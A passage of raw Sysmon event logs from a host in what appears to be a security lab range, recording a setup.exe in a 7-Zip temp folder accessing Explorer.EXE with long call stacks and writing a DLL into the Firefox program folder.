dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.192{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.177{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-locale-l1-1-0.dll2021-01-18 13:59:52.177 10341000x800000000000000014396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 